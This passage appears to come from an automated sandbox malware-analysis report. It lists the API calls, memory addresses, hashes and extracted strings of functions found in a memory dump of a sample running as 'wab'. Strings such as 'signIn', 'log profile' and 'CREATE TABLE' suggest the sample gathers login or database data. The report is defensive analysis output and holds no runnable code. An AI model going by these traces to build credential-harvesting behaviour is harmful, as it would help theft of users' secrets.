                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                APIs
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                • memcpy.MSVCRT ref: 0040EB80
                                • memcpy.MSVCRT ref: 0040EB94
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                • String ID: ($d
                                • API String ID: 1140211610-1915259565
                                • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                APIs
                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                • GetLastError.KERNEL32 ref: 004178FB
                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$ErrorLastLockSleepUnlock
                                • String ID:
                                • API String ID: 3015003838-0
                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                APIs
                                • memset.MSVCRT ref: 00407E44
                                • memset.MSVCRT ref: 00407E5B
                                • _mbscpy.MSVCRT ref: 00407E7E
                                • _mbscpy.MSVCRT ref: 00407ED7
                                • _mbscpy.MSVCRT ref: 00407EEE
                                • _mbscpy.MSVCRT ref: 00407F01
                                • wcscpy.MSVCRT ref: 00407F10
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                • String ID:
                                • API String ID: 59245283-0
                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                • GetLastError.KERNEL32 ref: 0041855C
                                • Sleep.KERNEL32(00000064), ref: 00418571
                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                • GetLastError.KERNEL32 ref: 0041858E
                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                • String ID:
                                • API String ID: 3467550082-0
                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                • API String ID: 3510742995-3273207271
                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                • memset.MSVCRT ref: 00413ADC
                                • memset.MSVCRT ref: 00413AEC
                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                • memset.MSVCRT ref: 00413BD7
                                • wcscpy.MSVCRT ref: 00413BF8
                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                • String ID: 3A
                                • API String ID: 3300951397-293699754
                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                • wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                • wcslen.MSVCRT ref: 0040D1D3
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                • memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                • String ID: strings
                                • API String ID: 3166385802-3030018805
                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                APIs
                                • memset.MSVCRT ref: 00411AF6
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                • wcsrchr.MSVCRT ref: 00411B14
                                • wcscat.MSVCRT ref: 00411B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                • String ID: AE$.cfg$General$EA
                                • API String ID: 776488737-1622828088
                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                APIs
                                • memset.MSVCRT ref: 0040D8BD
                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                • memset.MSVCRT ref: 0040D906
                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                • _wcsicmp.MSVCRT ref: 0040D92F
                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                • String ID: sysdatetimepick32
                                • API String ID: 1028950076-4169760276
                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: -journal$-wal
                                • API String ID: 438689982-2894717839
                                • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Item$Dialog$MessageSend
                                • String ID:
                                • API String ID: 3975816621-0
                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                APIs
                                • _wcsicmp.MSVCRT ref: 00444D09
                                • _wcsicmp.MSVCRT ref: 00444D1E
                                • _wcsicmp.MSVCRT ref: 00444D33
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp$wcslen$_memicmp
                                • String ID: .save$http://$https://$log profile$signIn
                                • API String ID: 1214746602-2708368587
                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                • String ID:
                                • API String ID: 2313361498-0
                                • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                APIs
                                • GetClientRect.USER32(?,?), ref: 00405F65
                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                • GetWindow.USER32(00000000), ref: 00405F80
                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$ItemMessageRectSend$Client
                                • String ID:
                                • API String ID: 2047574939-0
                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                • String ID:
                                • API String ID: 4218492932-0
                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                APIs
                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                • memcpy.MSVCRT ref: 0044A8BF
                                • memcpy.MSVCRT ref: 0044A90C
                                • memcpy.MSVCRT ref: 0044A988
                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                • memcpy.MSVCRT ref: 0044A9D8
                                • memcpy.MSVCRT ref: 0044AA19
                                • memcpy.MSVCRT ref: 0044AA4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: gj
                                • API String ID: 438689982-4203073231
                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                • API String ID: 3510742995-2446657581
                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                • memset.MSVCRT ref: 00405ABB
                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                • SetFocus.USER32(?), ref: 00405B76
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$FocusItemmemset
                                • String ID:
                                • API String ID: 4281309102-0
                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintfwcscat
                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                • API String ID: 384018552-4153097237
                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ItemMenu$CountInfomemsetwcschr
                                • String ID: 0$6
                                • API String ID: 2029023288-3849865405
                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                APIs
                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                • memset.MSVCRT ref: 00405455
                                • memset.MSVCRT ref: 0040546C
                                • memset.MSVCRT ref: 00405483
                                • memcpy.MSVCRT ref: 00405498
                                • memcpy.MSVCRT ref: 004054AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$memcpy$ErrorLast
                                • String ID: 6$\
                                • API String ID: 404372293-1284684873
                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                APIs
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                • wcscpy.MSVCRT ref: 0040A0D9
                                • wcscat.MSVCRT ref: 0040A0E6
                                • wcscat.MSVCRT ref: 0040A0F5
                                • wcscpy.MSVCRT ref: 0040A107
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                • String ID:
                                • API String ID: 1331804452-0
                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                APIs
                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                • String ID: advapi32.dll
                                • API String ID: 2012295524-4050573280
                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                APIs
                                Strings
